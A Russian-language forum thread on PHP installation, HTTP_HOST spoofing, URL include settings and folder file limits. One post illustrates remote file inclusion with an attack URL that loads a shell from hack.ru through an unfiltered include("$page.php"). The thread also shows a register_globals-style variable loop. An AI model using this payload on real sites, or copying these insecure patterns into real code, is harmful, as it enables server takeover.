ну тогда просто скомтилировать с теми же параметрами, но добавить то чего не хватает.
удалять как бы не обязательно, у меня вообще несколько версий пхп установлено, каждый в свой папке, а бинарники копируются в /usr/local/bin к примеру, ну и модуль для апача также подключить можно из нужной папки))
Интересно чем мешает пхп темболее установленный из исходников, если только места на диске не хватает ) Да, параметры конфигурации есть в phpinfo, там и видно будет куда були установлены все файлы.
Понятно что пхп, а HTTP_HOST где инициируется? тоже в пхп? 😂
Подмена ДНС.. каким образом она вообще влияет на include ? что то тут не договаривается 🙄
PS> тут все расхождения и получаются потому что кто-то силён в программинге, кто-то больше в юниксах и администрировании, кто-то великий знаток пхп, кто-то по секюрити или хостингам, а вот того кто во всём силён похоже тут нету :D
LEOnidUKG, я только что про это писал, только более изящно ))
И наверное имелось в виду это:
<?php include("http://$_SERVER[HTTP_HOST]/includes/example_include.php"); ?>
непонимаю зачем писать полные пути, да ещё и через URL, почему не писать просто includes/example_include.php
Andreyka, И что легко можно ДНС подменить? Насколько я знаю к серверу запрос всегда идёт по ИП, а вебсервер (apache/nginx) смотрит заголовок Host: www.example.com, и уже направляет на нужный виртуальный хост. И если там не тот домен то и отдан будет не тот сайт)
Так что я не знаю каким образом можно подделать $_SERVER[HTTP_HOST], кроме случая ТС, где через скрипт объявляются все гет и пост переменные, а используются всё равно глобальные )
PS. allow_url_fopen allow_url_include
Лучше было бы сделать эти опции не в одну функцию а сделать просто отдельные функции, например:
fopen_url / include_url / file_get_contents_url
Уязвимости там нет, но почему то программист надеится на то что allow_url_fopen включен..
Вот такое встречается часто:
example.com/?page=index
а напишем ка мы так:
example.com/?page=http://hack.ru/shell
А вот он програмер который незнает что включена нами почитаемая опция, да и вообще не знает что такое возможно, да и к тому же не фильтрирует переменную page:
<?
...
include("$page.php");
Воаля:
include("http://hack.ru/shell.php");
ТС использует помоему очень плохой скрипт + к тому же на плохом хостинге)
тут дело привычки, и так и так можно писать безопасно, вспомним пхп3.. в то время все скрипты писались с rg on .. хотя у этого rg on может много чего боком вылазить, например как в данном случае )
Теперь понятно откуда ноги растут, система то не переписывает глобальные, а этот скрипт переписывает)) Тогда такое преобразование будет более менее безопасным..
foreach ($_GET as $v => $e) {$v=strtolower($v); $$v=$e;}
PS> с rg on можно очень даже неплохо писать, дело привычки ;)
значит прийдётся по 10т делить.. хотя не очень то удобно (
У меня много таких папок, где до 20т файликов. (Linux Fat32)
Скажите, а сколько всё таки держать файлов в одной папке не рекомендуется?
Когда могут возникнуть проблемы?? 100т это не страшно или лучше делить по 10т?
Хтмл код разный, повлиять может много что..
